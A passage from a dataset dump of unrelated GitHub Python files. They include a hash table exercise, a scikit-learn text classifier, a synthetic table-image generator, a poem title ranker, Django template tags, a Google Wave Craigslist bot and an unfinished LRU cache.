slot[hash_key] = LinkedList.store(slot,hash_key,student) #구한 hash key의 slot에 데이터 저장\n break\n else: #잘못된 input이 들어올 때\n print(\"wrong input. Please re-input\")\n\n elif(mode ==2): #search mode\n while(True):\n e_find_id = input(\"enter ID that you find : \")\n if(e_find_id.isdigit()):\n find_id = int(e_find_id)\n hash_key = LinkedList.hash_function(find_id)\n LinkedList.search(slot,hash_key,find_id) #hash key로 데이터 찾기\n break\n else: #잘못된 input이 들어올 때\n print(\"wrong input. Please re-input\")\n\n elif(mode ==3): #show_hash_table\n print(\"show hash table\")\n for i in range(0,100):\n print(slot[i])\n else: #exit\n break\n\n","repo_name":"masiro97/AILAB","sub_path":"Lab/lab02/hw01/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1658,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"71190268533","text":"# Greg Guyles\r\n# Final Project: Text Classification\r\n# Machine Learning\r\n# CU Boulder\r\n# 04/28/2014\r\n\r\nfrom multiprocessing import Process\r\nimport os\r\nfrom sklearn.feature_extraction.text import TfidfVectorizer\r\nfrom sklearn.svm import SVC\r\nfrom sklearn.pipeline import Pipeline\r\nfrom sklearn.datasets import load_files\r\nfrom sklearn.cross_validation import train_test_split\r\nfrom sklearn import metrics\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom kaggle_test import metrics_est, train_full\r\nfrom sklearn.ensemble import ExtraTreesClassifier\r\nfrom sklearn.feature_selection import SelectKBest, chi2\r\nfrom os.path import isfile\r\nimport sys\r\n\r\nif __name__ == \"__main__\":\r\n\r\n # import data\r\n subset = sys.argv[1]\r\n if(subset == '-full'):\r\n movie_reviews_data_folder = \"/home/gregor/ipyServer/data/movie_review/train\"\r\n movie_reviews_test_data_folder = \"/home/gregor/ipyServer/data/movie_review/test\"\r\n else:\r\n movie_reviews_data_folder = \"/home/gregor/ipyServer/data/movie_review/train_sub\"\r\n movie_reviews_test_data_folder = \"/home/gregor/ipyServer/data/movie_review/test_sub\"\r\n\r\n dataset = load_files(movie_reviews_data_folder, shuffle=False)\r\n test_data = load_files(movie_reviews_test_data_folder, shuffle=False)\r\n print(len(test_data))\r\n print(\"n_samples: %d\\n\" % len(dataset.data))\r\n\r\n # Build vectorizer\r\n vectorizer = TfidfVectorizer(sublinear_tf=False, max_df=0.1,\r\n ngram_range=(1,2))\r\n\r\n text_clf = ExtraTreesClassifier(max_depth=1024, min_samples_leaf=8,\r\n min_samples_split=16)\r\n\r\n reduceParams = 80 * 1000\r\n\r\n kaggle_test_out = '/home/gregor/ipyServer/movie_review/output/kaggle_test_04_ExTrees.csv'\r\n\r\n\r\n###############################################################################\r\n\r\n if isfile(kaggle_test_out):\r\n kaggle_test_out = kaggle_test_out + '.out'\r\n\r\n outfile_kaggle = open(kaggle_test_out, 'w+')\r\n outfile_kaggle.write('Id,Prediction\\n')\r\n\r\n # train in entire set for kaggle test\r\n X_train = vectorizer.fit_transform(dataset.data)\r\n X_test = vectorizer.transform(test_data.data)\r\n print(\"Org. shape kaggle test: \" + str(X_train.get_shape) + '\\n')\r\n\r\n if(subset == '-full'):\r\n kbest = reduceParams\r\n else:\r\n kbest = 'all'\r\n ch2 = SelectKBest(chi2, k=kbest)\r\n X_train = ch2.fit_transform(X_train, dataset.target)\r\n X_test = ch2.transform(X_test)\r\n print(\"Reduced Shape kaggle test: \" + str(X_train.get_shape) + '\\n')\r\n\r\n text_clf.fit(X_train.toarray(), dataset.target)\r\n\r\n # predict the outcome on the traing test and store it in target_perdicted\r\n target_perdicted = text_clf.predict(X_test.toarray())\r\n\r\n for i in range(len(target_perdicted)):\r\n outfile_kaggle.write(str(i + 1) + ',' + str(target_perdicted[i]) + '\\n')\r\n\r\n outfile_kaggle.close()\r\n print('Test Compleated')","repo_name":"gregguyles/CU-MachineLearning","sub_path":"finalProject/run_extree4.py","file_name":"run_extree4.py","file_ext":"py","file_size_in_byte":2927,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"71643503092","text":"import random\n\nimport cv2\nimport numpy as np\nfrom PIL import Image, ImageFont, ImageDraw, ImageColor\n\n\ndef show_img(img):\n cv2.imshow('name', img)\n cv2.waitKey(0)\n cv2.destroyAllWindows()\n\n\nclass Line(object):\n def __init__(self, line_thickness=0, type=1):\n assert line_thickness % (type + 1) == 0\n self.line_thichness = line_thickness\n self.type = type # 0 là ẩn, n = n vạch\n\n def set_invisible(self):\n self.type = 0\n\n\nclass Row(object):\n def __init__(self, height, margin_top, margin_bottom, index, line_top: Line, line_bottom: Line):\n self.height = height\n self.index = index\n self.margin_top = margin_top\n self.margin_bottom = margin_bottom\n self.line_top = line_top\n self.line_bottom = line_bottom\n\n def get_height(self):\n return self.height + self.line_top.line_thichness + self.line_bottom.line_thichness\n\n\nclass Col(object):\n def __init__(self, width, margin_left, margin_right, index, line_left: Line, line_right: Line):\n self.width = width\n self.index = index\n self.margin_left = margin_left\n self.margin_right = margin_right\n self.line_left = line_left\n self.line_right = line_right\n\n def get_width(self):\n return self.width + self.line_left.line_thichness + self.line_right.line_thichness\n\n\nclass Cell(object):\n\n def __init__(self, col: Col, row: Row, text: str, font: str, align: str, size: int, cell_id: int):\n self.col = col\n self.row = row\n self.text = text\n self.cell_id = cell_id\n self.font = font\n self.align = align\n self.size = size\n\n\nclass Table(object):\n def __init__(self, widths: list = [0.6, 0.2, 0.2], table_widths=1000, table_height=500,\n margin_left=10, margin_right=10, margin_top=5, margin_bottom=1):\n self.width_each_cell = list(map(lambda x: int(table_widths * x), widths))\n self.size = map_pixel_to_size(int(41 * table_widths / 1500))\n self.n_rows = table_height // Row(height=int(41 * table_widths / 1500), margin_top=margin_top,\n margin_bottom=margin_bottom,\n index=-1, line_top=Line(2, 1), line_bottom=Line(6, 2)).get_height()\n self.n_cols = len(widths)\n self.cols = []\n self.rows = []\n self.cells = [[] for _ in range(self.n_rows)]\n self.fonts = ['/home/andn/PycharmProjects/table_detection/font/times.ttf',\n '/home/andn/PycharmProjects/table_detection/font/timesbd.ttf',\n '/home/andn/PycharmProjects/table_detection/font/timesi.ttf',\n '/home/andn/PycharmProjects/table_detection/font/timesbi.ttf']\n\n # <------------------ gererate text in table --------------------->\n # dong` dau tien\n text = [[''] * self.n_cols for _ in range(self.n_rows)]\n for i in range(1, self.n_cols):\n text[0][i] = generate_date_data()\n # dong 2 -> n-1\n for i in range(1, self.n_rows - 1):\n if random.random() < 0.2:\n continue\n text[i][0] = generate_string(random.randint(3, 10))\n for j in range(1, self.n_cols):\n if random.random() < 0.2:\n continue\n text[i][j] = generate_tien(random.randint(7, 12))\n # dong n\n text[self.n_rows - 1][0] = \"Cộng\"\n for j in range(1, self.n_cols):\n text[self.n_rows - 1][j] = generate_tien(random.randint(7, 12))\n # <------------------ \\gererate text in table --------------------->\n # <------------------ compute height each cell --------------------->\n image_font = ImageFont.truetype(font=self.fonts[1], size=self.size)\n a_t = []\n for t in text:\n a_t += t\n _t = ' '.join(a_t)\n text_height = max([image_font.getsize(w)[1] for w in _t.split()])\n text_height += margin_top + margin_bottom\n self.heigh_each_cell = [text_height] * self.n_rows\n # <------------------ \\compute height each cell --------------------->\n #\n for i, w in enumerate(self.width_each_cell[:-1]):\n self.cols.append(Col(width=w, margin_left=margin_left, margin_right=margin_right,\n index=i, line_left=Line(2, 1), line_right=Line(0, 0)))\n self.cols.append(Col(width=self.width_each_cell[-1], margin_left=margin_left, margin_right=margin_right,\n index=len(self.width_each_cell), line_left=Line(2, 1), line_right=Line(2, 1)))\n\n for i, h in enumerate(self.heigh_each_cell[:-1]):\n self.rows.append(Row(height=h, margin_top=margin_top, margin_bottom=margin_bottom,\n index=i, line_top=Line(2, 1), line_bottom=Line(0, 0)))\n self.rows.append(Row(height=self.heigh_each_cell[-1], margin_top=margin_top, margin_bottom=margin_bottom,\n index=len(self.heigh_each_cell), line_top=Line(2, 1), line_bottom=Line(6, 2)))\n\n self.table_height = sum([r.get_height() for r in self.rows])\n self.table_width = sum([c.get_width() for c in self.cols])\n\n for i, r in enumerate(self.rows):\n for j, c in enumerate(self.cols):\n if i == 0 or i == self.n_rows - 1:\n self.cells[i].append(\n Cell(col=c, row=r, text=text[i][j], cell_id=j, font=self.fonts[1], align='left',\n size=self.size))\n else:\n self.cells[i].append(\n Cell(col=c, row=r, text=text[i][j], cell_id=j, font=self.fonts[0], align='left',\n size=self.size))\n\n for i in range(self.n_rows):\n for j in range(self.n_cols):\n if j != 0:\n self.cells[i][j].align = 'right'\n\n def get_col_start(self, index):\n return sum([c.get_width() for c in self.cols[:index]])\n\n def get_row_start(self, index):\n return sum([r.get_height() for r in self.rows[:index]])\n\n def draw(self, background_color=255):\n img = np.zeros((self.table_height, self.table_width, 3), dtype=np.uint8)\n img[:, :] = background_color\n for i in range(self.n_rows):\n if i != 1 and i != self.n_rows - 1:\n continue\n for j in range(self.n_cols):\n if i == self.n_rows - 1 and j != 0:\n img = self.show_cell_by_xy(img, i, j, left=False, right=False, top=True, bottom=True,\n margin_left=True, margin_right=True)\n elif i == self.n_rows - 1 and j == 0:\n continue\n else:\n img = self.show_cell_by_xy(img, i, j, left=False, right=False, top=True, bottom=True)\n\n for i_r, row in enumerate(self.rows):\n for i_c, col in enumerate(self.cols):\n img = self.draw_text_cell_by_xy(img, i_r, i_c)\n return img\n\n def draw_line(self, line: Line, img, xmin, xmax, ymin, ymax, orient='vertical'):\n assert orient in ['vertical', 'horizontal']\n if line.type == 0:\n return img\n line_thichness = line.line_thichness // (2 * line.type - 1)\n for i in range(2 * line.type - 1):\n if i % 2 == 0:\n if orient == 'horizontal':\n start = xmin + i * line_thichness\n img[start:start + line_thichness, ymin:ymax, :] = 0\n else:\n start = ymin + i * line_thichness\n img[xmin:xmax, start:start + line_thichness, :] = 0\n return img\n\n def show_cell_by_xy(self, img, x: int, y: int, left=False, right=False, top=False, bottom=False,\n margin_left=False, margin_right=False, margin_top=False, margin_bottom=False):\n xmin = self.get_row_start(x) if not margin_top else self.get_row_start(x) + self.rows[x].margin_top\n xmax = xmin + self.rows[x].get_height() if not margin_bottom else xmin + self.rows[x].get_height() \\\n - self.rows[x].margin_bottom\n ymin = self.get_col_start(y) if not margin_left else self.get_col_start(y) + self.cols[y].margin_left\n ymax = ymin + self.cols[y].get_width() if not margin_right else self.get_col_start(y) + self.cols[y].get_width() \\\n - self.cols[y].margin_right\n\n if left:\n img = self.draw_line(line=self.cols[y].line_left, img=img, orient=\"vertical\",\n xmin=xmin,\n xmax=xmax,\n ymin=ymin,\n ymax=ymin + self.cols[y].line_left.line_thichness)\n if right:\n img = self.draw_line(line=self.cols[y].line_right, img=img, orient=\"vertical\",\n xmin=xmin,\n xmax=xmax,\n ymin=ymax - self.cols[y].line_right.line_thichness,\n ymax=ymax)\n if top:\n img = self.draw_line(line=self.rows[x].line_top, img=img, orient=\"horizontal\",\n xmin=xmin,\n xmax=xmin + self.rows[x].line_top.line_thichness,\n ymin=ymin,\n ymax=ymax)\n if bottom:\n img = self.draw_line(line=self.rows[x].line_bottom, img=img, orient=\"horizontal\",\n xmin=xmax - self.rows[x].line_bottom.line_thichness,\n xmax=xmax,\n ymin=ymin,\n ymax=ymax)\n return img\n\n def draw_text_cell_by_xy(self, img, x: int, y: int):\n xmin, ymin, xmax, ymax = self.get_bounding_box_by_xy(x, y)\n img = draw_text(text=self.cells[x][y].text, font=self.cells[x][y].font, align=self.cells[x][y].align,\n size=self.cells[x][y].size,\n xmin=ymin,\n ymin=xmin,\n xmax=ymax, ymax=xmax, img=img, text_color='#000000,#282828')\n return img\n\n def get_bounding_box_by_xy(self, x, y):\n # row\n xmin = self.get_row_start(x) + self.rows[x].line_top.line_thichness + self.rows[x].margin_top\n xmax = self.get_row_start(x) + self.rows[x].get_height() \\\n - self.rows[x].line_bottom.line_thichness - self.rows[x].margin_bottom\n # col\n ymin = self.get_col_start(y) + self.cols[y].line_left.line_thichness + self.cols[y].margin_left\n ymax = self.get_col_start(y) + self.cols[y].get_width() \\\n - self.cols[y].line_right.line_thichness - self.cols[y].margin_right\n return xmin, ymin, xmax, ymax\n\n\ndef draw_text(text, font, align, size, xmin, ymin, xmax, ymax, img, text_color='#000000,#282828'):\n assert align in ['left', 'right', 'center', 'justify']\n if type(img) == np.ndarray:\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n img = Image.fromarray(img) # BGR\n\n image_font = ImageFont.truetype(font=font, size=size)\n words = text.split(\" \")\n space_width = image_font.getsize(\" \")[0] * 1\n space_height = image_font.getsize(\" \")[1] * 1\n words_width = [image_font.getsize(w)[0] for w in words]\n text_width = sum(words_width) + int(space_width) * (len(words) - 1)\n text_height = max([image_font.getsize(w)[1] for w in words])\n\n txt_draw = ImageDraw.Draw(img)\n colors = [ImageColor.getrgb(c) for c in text_color.split(\",\")]\n c1, c2 = colors[0], colors[-1]\n\n fill = (\n random.randint(min(c1[0], c2[0]), max(c1[0], c2[0])),\n random.randint(min(c1[1], c2[1]), max(c1[1], c2[1])),\n random.randint(min(c1[2], c2[2]), max(c1[2], c2[2])),\n )\n if align == 'right':\n xmin = xmax - text_width\n for i, w in enumerate(words):\n start_x = sum(words_width[0:i]) + i * int(space_width) + xmin\n start_y = 0 + ymin\n if start_x + words_width[i] > xmax:\n break\n txt_draw.text(\n (start_x, start_y),\n w,\n fill=fill,\n font=image_font,\n )\n\n img = np.array(img)\n img = cv2.cvtColor(img, cv2.COLOR_RGB2BGR)\n return img\n\n\ndef generate_date_data():\n ngay = random.randint(1, 31)\n thang = random.randint(1, 12)\n nam = random.randint(2000, 2050)\n return f\"{ngay}/{thang}/{nam}\"\n\n\ndef generate_tien(n):\n m = [str(random.randint(0, 9)) for _ in range(n)]\n m_ = [''.join(m[i:i + 3]) for i in range(0, n, 3)]\n s = '.'.join(m_)[::-1]\n return s\n\n\nwith open(\"/home/andn/PycharmProjects/TextRecognitionDataGenerator/texts/VNESEcorpus_5.txt\") as f:\n lines = f.readlines()\n\n\ndef generate_string(n):\n line = random.choice(lines)\n words = line.split()\n if len(words) < n:\n return line\n start = random.randint(0, len(words) - n)\n return ' '.join(words[start:start + n])\n\n\ndef map_pixel_to_size(pixel):\n a = {11: 10, 12: 11, 14: 12, 15: 13, 16: 14, 17: 15, 18: 16, 20: 17, 21: 18, 21: 19, 22: 20, 23: 21, 25: 22,\n 26: 23, 27: 24, 28: 25, 30: 26, 31: 27, 31: 28, 32: 29, 34: 30, 35: 31, 36: 32, 37: 33, 38: 34, 40: 35, 41: 36,\n 41: 37, 42: 38, 43: 39}\n\n while pixel not in a:\n pixel += 1\n\n return a[pixel]\n\n\nif __name__ == '__main__':\n show_img(Table().draw(200))\n# img = np.zeros((500, 500, 3), dtype=np.uint8) + 255\n# fonts = ['font/times.ttf', 'font/timesbd.ttf', 'font/timesi.ttf', 'font/timesbi.ttf']\n# draw_text(text=\"Đào Ngọc An\", font=fonts[0], align='center', size=48, xmin=200, ymin=200, xmax=500, ymax=500, img=img,\n# text_color='#000000,#282828').show()\n\n# chữ viết thường, chữ nghiêng, chữ viết đậm, chữ viết đậm nghiêng\n#\n","repo_name":"DaoNgocAn/table_detection","sub_path":"generate_table.py","file_name":"generate_table.py","file_ext":"py","file_size_in_byte":14004,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"25457100537","text":"import sys\nsys.setrecursionlimit(10**6)\n\ndef dfs(heightRoot, widthRoot, board):\n global result\n\n visitList[heightRoot][widthRoot] = True\n\n if not result:\n for i in range(2):\n subHeight = (heightRoot + (down[i]*board[heightRoot][widthRoot]))\n subWidth = (widthRoot + (right[i]*board[heightRoot][widthRoot]))\n \n if 0 <= subHeight < length and 0 <= subWidth < length:\n if not visitList[subHeight][subWidth]:\n if board[subHeight][subWidth] == -1:\n result = True\n return\n else:\n dfs(subHeight, subWidth, board)\n else:\n return\n\nresult = False\ndown = [1,0]\nright = [0,1]\n\nlength = int(sys.stdin.readline())\nboard = []\nvisitList = [[False for i in range(length)] for i in range(length)]\nfor i in range(length):\n board.append(list(map(int, (sys.stdin.readline()).split())))\n\ndfs(0, 0, board)\n\nif result:\n sys.stdout.write(\"HaruHaru\")\nelse:\n sys.stdout.write(\"Hing\")\n\n","repo_name":"jy940408/algorithm_python","sub_path":"PYTHONDepthFirstSearch/점프왕쩰리.py","file_name":"점프왕쩰리.py","file_ext":"py","file_size_in_byte":1059,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"1825345536","text":"# Write a Python program to find whether a given number (accept from the user) is even or odd, print out an appropriate message to the user.\n\ndef even_odd(num):\n if abs(num) % 2 == 0:\n return \"The number is even.\"\n else:\n return \"The number is odd.\"\n\nnum = int(input(\"Please enter a number : \"))\nprint(even_odd(num))","repo_name":"hasanyucel/PythonProjects","sub_path":"Applications/Basics/Basic-021.py","file_name":"Basic-021.py","file_ext":"py","file_size_in_byte":336,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"70194195254","text":"import ast\n\nimport numpy as np\nimport re\nimport string\nfrom pymorphy2 import MorphAnalyzer\n\n\ndef create_adj_matrix(poem):\n lines_vocab, poem_vocab = create_vocabularies(poem)\n p_size = len(lines_vocab)\n adj_matrix = np.zeros((p_size, p_size))\n for line_1 in range(p_size):\n vocab1 = lines_vocab[line_1]\n for line_2 in range(p_size):\n if line_1 != line_2:\n vocab2 = lines_vocab[line_2]\n similarity = compute_cosine_similarity(vocab1, vocab2, poem_vocab)\n adj_matrix[line_1, line_2] = similarity\n return adj_matrix\n\n\ndef compute_lines_degrees(adj_matrix):\n size = len(adj_matrix)\n edges = np.zeros(size, int)\n for i in range(size):\n for j in range(size):\n if i != j and adj_matrix[i, j] > 0:\n edges[i] += 1\n return list(edges)\n\n\ndef compute_cosine_similarity(vocab1, vocab2, poem_vocab):\n words1 = vocab1.keys()\n words2 = vocab2.keys()\n common_words = list(words1 & words2)\n if not common_words:\n return 0.\n numerator = 0.\n for i in range(len(common_words)):\n tf_line1 = vocab1.get(common_words[i])\n tf_line2 = vocab2.get(common_words[i])\n idf = poem_vocab.get(common_words[i]) - 0.85*tf_line1 - 0.85*tf_line2\n numerator += tf_line1 * tf_line2 * np.power(idf, 2)\n tf_sum1 = 0.\n tf_sum2 = 0.\n for w in words1:\n tf = vocab1.get(w)\n idf = poem_vocab.get(w) - tf\n tf_sum1 += tf * idf\n for w in words2:\n tf = vocab2.get(w)\n idf = poem_vocab.get(w) - tf\n tf_sum2 += tf * idf\n denominator = np.sqrt(tf_sum1)*np.sqrt(tf_sum2)\n return numerator if denominator == 0. else numerator/denominator\n\n\ndef generate_title(poem):\n poem = ast.literal_eval(poem)\n matrix = create_adj_matrix(poem)\n degrees = compute_lines_degrees(matrix)\n line_prob = sum([line for line in matrix]) * degrees\n indexed_prob = np.array([[i, lst] for i, lst in enumerate(line_prob)])\n sorted_ind = indexed_prob[:, 1].argsort()\n size = len(sorted_ind)\n title_ind = sorted_ind[size-1] if sorted_ind[0] != 0 else sorted_ind[size-2]\n return poem[title_ind]\n\n\ndef generate_title_with_probabilities(poem):\n poem = make_one_line(poem)\n words = list(map(lambda x: x.lower(), get_line_words(poem)))\n ngramms = split_to_ngramms(words, 2)\n matrix = create_adj_matrix(ngramms)\n degrees = compute_lines_degrees(matrix)\n line_sum = sum([line for line in matrix])\n print(\"l_sum \", line_sum)\n line_prob = []\n for i, line in enumerate(line_sum):\n el = line if degrees[i] == 0 else line/(2*degrees[i])\n if el > 0:\n line_prob.append(el)\n indexed_prob = np.array([[i, lst] for i, lst in enumerate(line_prob)])\n print(\"ind_pr \", indexed_prob)\n sorted_ind = indexed_prob[:, 1].argsort()\n lines_with_prob = []\n size = len(sorted_ind)\n start_ind = size - 6 if size > 6 else 0\n for i in range(start_ind, size):\n ind = sorted_ind[i]\n lines_with_prob.append([ngramms[ind], indexed_prob[ind, 1]])\n return lines_with_prob\n\n\nmorph = MorphAnalyzer()\n\n\ndef create_vocabularies(poem):\n poem_vocab = {}\n lines_vocab = []\n closest_nouns = {'femn': '', 'masc': '', 'neut': ''}\n for i in range(len(poem)):\n line = get_line_words(poem[i])\n if len(line) != 0:\n line_vocab = {}\n for word in line:\n parsed = morph.parse(word)[0]\n lemma = parsed.normal_form\n pos = str(parsed.tag)\n poem_vocab = change_poem_vocab(poem_vocab, lemma, pos, closest_nouns)\n line_vocab = change_line_vocab(line_vocab, lemma, pos, closest_nouns)\n lines_vocab.append(line_vocab)\n return lines_vocab, poem_vocab\n\n\ndef get_line_words(line):\n word = \"\"\n words = []\n for i, char in enumerate(line):\n if char in \" -\" and word != \"\":\n words.append(word)\n word = \"\"\n elif (char in \" -\\n\" and word == \"\") or (char in \"«»…\"):\n continue\n elif char not in string.punctuation:\n word += char\n return words\n\n\ndef change_line_vocab(line_vocab, lemma, pos, closest_nouns):\n if lemma in line_vocab:\n line_vocab[lemma] += 1\n else:\n changed = False\n if re.match(r'NPRO(.*),3per(.*)sing', pos):\n lemma, changed = update_noun_count(closest_nouns, pos, lemma)\n if not changed and not (re.match(r'(PRCL|PREP|CONJ|PNCT)', pos)):\n line_vocab[lemma] = 1\n\n if changed:\n if lemma in line_vocab:\n line_vocab[lemma] += 1\n return line_vocab\n\n\ndef change_poem_vocab(poem_vocab, lemma, pos, closest_nouns):\n if lemma in poem_vocab:\n poem_vocab[lemma] += 1\n else:\n changed = False\n if re.match(r'NOUN', pos):\n closest_nouns = change_closest_noun(closest_nouns, pos, lemma)\n elif re.match(r'NPRO(.*),3per(.*)sing', pos):\n lemma, changed = update_noun_count(closest_nouns, pos, lemma)\n\n if not changed and not (re.match(r'PRCL|PREP|CONJ|PNCT', pos)):\n poem_vocab[lemma] = 1\n elif changed and lemma in poem_vocab:\n poem_vocab[lemma] += 1\n return poem_vocab\n\n\ndef change_closest_noun(closest_nouns, analysis, lemma):\n for gender in closest_nouns.keys():\n if re.search(gender, analysis):\n closest_nouns[gender] = lemma\n return closest_nouns\n\n\ndef update_noun_count(closest_nouns, analysis, lemma):\n for gender in closest_nouns.keys():\n if re.search(gender, analysis):\n if closest_nouns.get(gender) == '':\n return lemma, False\n else:\n return closest_nouns.get(gender), True\n\n\ndef split_to_ngramms(words, n):\n forbidden = re.compile(r\"PRCL|PREP|CONJ|PNCT\")\n filtered = [w for w in words if not re.search(forbidden, str(morph.parse(w)[0].tag))]\n if n == 1:\n return filtered\n if n > 1:\n ngrams = zip(*[filtered[i:] for i in range(n)])\n ngrams = [' '.join(ngram) for ngram in ngrams]\n return ngrams\n\n\ndef get_one_line_words(line):\n word = \"\"\n for char in line:\n if not(char in string.punctuation) and not(char in \"-«»…\"):\n word += char.lower()\n words = re.split(r' ', word)\n return words\n\n\ndef make_one_line(poem):\n res = re.split(r'\\n', poem)\n result = \"\"\n for i, r in enumerate(res):\n if len(r) == 0:\n continue\n elif i != len(res) - 1:\n result += (r + ' ')\n else:\n result += r\n return result\n","repo_name":"hellagod/poem_analyzer","sub_path":"modules/code/lex_rank.py","file_name":"lex_rank.py","file_ext":"py","file_size_in_byte":6633,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"7827989084","text":"# coding=utf-8\nfrom __future__ import absolute_import\nimport datetime\nfrom django import template\nfrom person.models import Person\n\nregister = template.Library()\n\n\ndef my_sort(value):\n list1 = str(value).split(' ')\n list1.sort(key=lambda x:x[0])\n new_list = []\n while len(list1) != 0:\n new_list.append(list1[0] + ' ' + list1[1])\n del list1[0:2]\n new_list.sort(key=lambda x:x[0])\n for i in new_list:\n return i\n\n\nregister.filter('my_sort', my_sort)\n\n\n\n# @register.filter(expects_localtime=True)\n# def test(value):\n# return value\n#\n# @register.simple_tag(takes_context=True)\n# def current_time(context, f, prefix=None):\n# prefix = prefix or context.get('date_prefix', '')\n# context['t'] = Person.objects.get(pk=1)\n# return prefix + datetime.datetime.now().strftime(f)\n#\n# @register.inclusion_tag('shop/menu.html', takes_context=True)\n# def menu(context, selected=None):\n# return {\n# 'items': ['Menu 1', 'Menu 2', 'Menu 3'],\n# 'selected': selected or context.get('selected_menu')\n# }\n@register.inclusion_tag('shop/show_messages.html', takes_context=True)\ndef show_messages(context, message=True):\n return {\n 'messages': (context.get('messages') if message else None)}\n\n\n","repo_name":"vova1995/SECL_Project","sub_path":"netshop/shop/templatetags/shoptags.py","file_name":"shoptags.py","file_ext":"py","file_size_in_byte":1255,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"6690926084","text":"from waveapi import events\nfrom waveapi import model\nfrom waveapi import robot\nfrom waveapi import document\n\nimport logging\nimport re\nimport craigslistStorage\nimport craigslistParser\n\ncraigslistLinkPattern = re.compile('http://[\\w\\.]+\\.craigslist\\.(org|ca)/[\\w/?=&+%]+')\n\ndef OnRobotAdded(properties, context):\n root_wavelet = context.GetRootWavelet()\n waveID = root_wavelet.GetId()\n \n logging.debug('Bot added to wave #%s' % waveID)\n\n root_wavelet.CreateBlip().GetDocument().SetText(\"\"\"Thanks for adding me !\n\nTo use me, simply add a URL to a result list on Craigslist in your first message.\n\nPlease note that it may take a few seconds before the first results are added to the wave.\n\nBecause of limitations/bugs of the Wave API, HTML content is not properly displayed, and new results are not automatically added to the wave. Theses features are ready on my side and should (hopefully) be implemented soon.\"\"\")\n\n\ndef OnBlipSubmitted(properties, context):\n rootWavelet = context.GetRootWavelet()\n waveID = rootWavelet.GetWaveId()\n waveletID = rootWavelet.GetId()\n\n # we try to see if a craigslist url is already associated with this wave\n wave = craigslistStorage.GetWave(waveID)\n\n # if not, we look for that URL in the root blip\n if wave is None:\n logging.debug('No url associated with wave #%s' % waveID)\n \n rootBlipId = rootWavelet.GetRootBlipId()\n rootBlip = context.GetBlipById(rootBlipId)\n doc = rootBlip.GetDocument()\n \n url = craigslistLinkPattern.search(doc.GetText())\n\n # if the url is found, store it\n if url is not None:\n searchUrl = url.group(0)\n logging.debug('URL found : %s' % searchUrl)\n\n wave = craigslistStorage.AddWave(waveID, waveletID, searchUrl)\n rootWavelet.CreateBlip().GetDocument().SetText('I found an URL ! I will now monitor %s and add search results to this wave !' % searchUrl)\n else:\n logging.debug('URL not found in root blip. Aborting...')\n return\n\n # now that we have the URL, let's fetch the result\n CraigslistWaveUpdater(context, wave)\n\nclass CraigslistWaveUpdater:\n def __init__(self, context, wave):\n \"\"\" Initiates a robot that will update the search results of the given craigslist wave \"\"\"\n self.wave = wave\n self.googleWave = context.GetWaveById(wave.waveID)\n self.wavelet = context.GetWaveletById(wave.waveletID)\n self.UpdateResults()\n\n def UpdateResults(self):\n \"\"\" Parses the search results webpage to look for new items \"\"\"\n logging.debug('Updating results for wave %s' % self.wave.waveID)\n \n # let's get the results we already have for this wave\n knownItems = craigslistStorage.GetWaveItemUrls(self.wave)\n\n # now, parse search results and look for new ones\n craigslistParser.ResultsList(self.wave.searchUrl, knownItems, self.NewResultItemFound)\n\n def NewResultItemFound(self, item):\n \"\"\" This method is called by the parser each time a new item was found \"\"\"\n logging.debug('Adding new item %s to wave %s' % (item.url, self.wave.waveID))\n\n # add the item to the list of items of the wave\n craigslistStorage.AddResultItem(self.wave, item.url)\n\n # create a new blip with the item details\n doc = self.wavelet.CreateBlip().GetDocument()\n\n doc.AppendText('%s\\n\\n' % item.url)\n doc.AppendText('%s (%s)\\n\\n' % (item.title, item.location))\n doc.AppendText('Date: %s\\nReply to: %s\\n\\n' % (item.date, item.email))\n doc.AppendText(item.text + '\\n')\n\n for url in item.imageURLs:\n doc.AppendText('\\n')\n doc.AppendElement(document.Image(url=url))\n\n\nif __name__ == '__main__':\n myRobot = robot.Robot('Craigslist Searchy',\n image_url='http://craigslist-searchy.appspot.com/assets/images/logo.png',\n version='1.1.7',\n profile_url='http://craigslist-searchy.appspot.com/')\n myRobot.RegisterHandler(events.BLIP_SUBMITTED, OnBlipSubmitted)\n myRobot.RegisterHandler(events.WAVELET_SELF_ADDED, OnRobotAdded)\n# myRobot.RegisterCronJob('/update', 60)\n myRobot.Run()\n","repo_name":"Wookai/craigslist-searchy","sub_path":"craigslistRobot.py","file_name":"craigslistRobot.py","file_ext":"py","file_size_in_byte":3970,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"2603404000","text":"# -*- coding: utf-8 -*-\n# author = \"Louis\"\n\n\nclass DLinkedNode:\n def __init__(self, key, value):\n self.key = key\n self.value = value\n self.pre = None\n self.next = None\n\n\nclass LRUCache:\n\n def __init__(self, capacity):\n self.capacity = capacity\n self.cache = {}\n self.head = DLinkedNode(None, None)\n self.tail = DLinkedNode(None, None)\n self.head.next = self.tail\n self.tail.pre = self.head\n\n def get(self, key):\n if key in self.cache:\n node = self.cache[key]\n self.moveNodeToFirst(node)\n return node.value\n return -1\n\n def put(self, key, value):\n if key in self.cache:\n node = self.cache[key]\n node.value = value\n self.moveNodeToFirst(node)\n else:\n node = DLinkedNode(key, value)\n self.cache[key] = node\n if self.capacity > 0:\n self.capacity -= 1\n else:\n mv_node = self.removeLastNode()\n self.cache.pop(mv_node.key)\n self.addNodeToFirst(node)\n\n def moveNodeToFirst(self, node):\n\n self.removeNode(node)\n self.addNodeToFirst(node)\n\n def addNodeToFirst(self, node):\n node.next = self.head.next\n node.pre = self.head\n self.head.next.pre = node\n self.head.next = node\n\n def removeNode(self, node):\n node.next.pre = node.pre\n node.pre.next = node.next\n # self.clearNode(node)\n\n def removeLastNode(self):\n node = self.tail.pre\n self.removeNode(node)\n return node\n # key = 